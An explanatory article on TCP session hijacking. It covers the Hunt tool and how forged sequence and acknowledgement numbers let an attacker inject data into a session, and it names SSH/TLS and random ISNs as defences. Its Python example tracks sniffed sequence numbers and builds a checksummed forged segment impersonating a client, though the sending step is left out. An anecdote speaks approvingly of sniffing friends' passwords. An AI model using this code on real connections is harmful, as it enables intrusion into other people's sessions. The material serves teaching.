
TCP Session Hijacking

Although TCP appears to be a safe protocol because of all the negotiation involved in session establishment and the precision involved in the data exchange, don't get complacent: it is not as secure as it should be. A network sniffer can be set up on an unsuspected machine to capture traffic on the network and snoop clear-text data such as user IDs and passwords that are not encrypted in any way. One of my friends did all this: he sniffed a dozen passwords and played with their network data. He was very much an expert at sniffing and using them; the other friends didn't even know their passwords were floating in raw text on the network.
Session hijacking software, such as Hunt, uses another approach to exploit an existing TCP session. It intercepts an established TCP session and takes over one end of the connection, redirecting the session to an attacker-controlled host.

The problem is that conventional TCP provides no authentication: nothing in the protocol confirms that the peers of an established connection are still the hosts that set it up. After a session has been established between two hosts, each host relies on only the following to recognise its peer:


  • IP address: The IP addresses of the two hosts must not change.
  • Port numbers: Most protocols communicate between the established ports only; the ports do not change.
  • Sequence numbers: The sequence number must advance predictably from the initial sequence number (ISN) by the aggregate number of bytes sent from one host to the other.
  • Acknowledgement numbers: The acknowledgement number must advance in step with the sequence numbers actually delivered, that is, with the aggregate number of bytes acknowledged from one host to the other.

If a hostile user can observe the data exchange and craft a segment with all four of these parameters set correctly, he can inject his own data into the session and hijack it. Imagine the damage that can be done if the hijacked session is one that has root authority. Many complications and considerations are involved in session hijacking (the legitimate sender keeps transmitting with its own numbers, so the two ends fall out of synchronisation as soon as the injected bytes are accepted), and it is not a trivial endeavor, but it is made much simpler by the Hunt software. The same list also shows where the defence lies: the attacker must be able to see the traffic to get the numbers right, so an encrypted and authenticated session layer such as SSH or TLS leaves a hijacker who lacks the session keys able only to break the connection, not to use it, and unpredictable ISNs stop blind guessing from off the path.
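How the four parameters turn into a forged segment, as an added example that is not part of the original post and is not Hunt's code: a sniffer-side tracker that follows the sequence numbers of both ends, a stripped-down model of the receiving host's acceptance checks, and a raw TCP segment builder with a correct checksum. The hosts, ports and observed segments are constructed for the illustration; it runs under Python 3 with no third-party packages.

```python
# Added illustration of TCP session hijacking: track the four parameters
# (addresses, ports, sequence and acknowledgement numbers) and forge a segment.
# Hosts, ports and the observed segments below are made up, not captured traffic.
import socket
import struct

MOD = 1 << 32  # the TCP sequence space wraps at 2^32


def seq_add(a, n):
    return (a + n) % MOD


def seq_between(lo, x, hi):
    """lo <= x <= hi in wrapping sequence-number arithmetic."""
    return (x - lo) % MOD <= (hi - lo) % MOD


class SessionTracker:
    """What an on-path sniffer learns: for each endpoint, the next sequence number
    it will send.  With the two (address, port) pairs this is all a peer uses to
    recognise a segment as belonging to the connection."""

    def __init__(self, a, b):
        self.ends = (a, b)                    # endpoints as (ip, port) tuples
        self.next_seq = {a: None, b: None}

    def observe(self, src, dst, seq, flags, payload_len):
        if {src, dst} != set(self.ends):
            return                            # some other connection
        # SYN and FIN each consume one sequence number, data consumes its length
        self.next_seq[src] = seq_add(seq, payload_len + ("S" in flags) + ("F" in flags))

    def forged_params(self, impersonate):
        """Header fields for a segment the peer accepts as if `impersonate` sent it."""
        peer = self.ends[1] if impersonate == self.ends[0] else self.ends[0]
        return {"src": impersonate, "dst": peer,
                "seq": self.next_seq[impersonate], "ack": self.next_seq[peer]}


class Endpoint:
    """Receive-side checks of a connected host, simplified to an exact sequence match."""

    def __init__(self, addr, peer, rcv_nxt, snd_una, snd_nxt):
        self.addr, self.peer = addr, peer
        self.rcv_nxt = rcv_nxt   # next sequence number expected from the peer
        self.snd_una = snd_una   # oldest byte we sent that is not yet acknowledged
        self.snd_nxt = snd_nxt   # next byte we will send

    def accept(self, src, dst, seq, ack, payload_len):
        if (src, dst) != (self.peer, self.addr):              # IP address and port
            return False
        if seq != self.rcv_nxt:                                # sequence number
            return False
        if not seq_between(self.snd_una, ack, self.snd_nxt):  # acknowledgement number
            return False
        self.rcv_nxt, self.snd_una = seq_add(seq, payload_len), ack
        return True


def checksum(data):
    """Internet checksum (RFC 1071) over `data`."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return ~s & 0xFFFF


def pseudo_header(src_ip, dst_ip, tcp_len):
    return socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 6, tcp_len)


def build_tcp_segment(src, dst, seq, ack, payload, flags=0x18):
    """Raw TCP header (default flags PSH|ACK) plus payload, ready for a raw IP socket."""
    (sip, sport), (dip, dport) = src, dst
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    csum = checksum(pseudo_header(sip, dip, len(hdr) + len(payload)) + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def tcp_checksum_ok(src_ip, dst_ip, segment):
    """A correctly checksummed segment sums to zero together with its pseudo-header."""
    return checksum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def hijack_demo():
    client, server = ("10.0.0.5", 40123), ("10.0.0.9", 23)   # made-up telnet session
    sniffer = SessionTracker(client, server)
    # Constructed sniffer view: handshake, a 5-byte command, a 40-byte reply
    for src, dst, seq, flags, n in [(client, server, 1000, "S", 0),
                                    (server, client, 5000, "SA", 0),
                                    (client, server, 1001, "A", 0),
                                    (client, server, 1001, "PA", 5),
                                    (server, client, 5001, "PA", 40)]:
        sniffer.observe(src, dst, seq, flags, n)
    srv = Endpoint(server, client, rcv_nxt=1006, snd_una=5001, snd_nxt=5041)

    p = sniffer.forged_params(impersonate=client)           # attacker poses as the client
    injected = b"id\r\n"
    segment = build_tcp_segment(p["src"], p["dst"], p["seq"], p["ack"], injected)
    injected_ok = srv.accept(p["src"], p["dst"], p["seq"], p["ack"], len(injected))
    # The real client knows nothing of this and sends its next command with its own
    # numbers; the server now sees it as out of sequence, which starts the ACK storm
    legit_ok = srv.accept(client, server, 1006, 5041, 5)
    return {"forged": p, "segment": segment,
            "injected_accepted": injected_ok, "real_client_accepted_after": legit_ok}


if __name__ == "__main__":
    print(hijack_demo())
```

Putting the segment on the wire needs a raw socket (root) with an IPv4 header in front, which the block leaves out on purpose. The part that matters for the argument is that nothing in `accept()` asks who the sender is, only whether the four numbers line up; the last return value shows the price of getting them right, because once the injected bytes are accepted the real client's next segment is out of sequence and the two legitimate ends start acknowledging each other's stale numbers.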
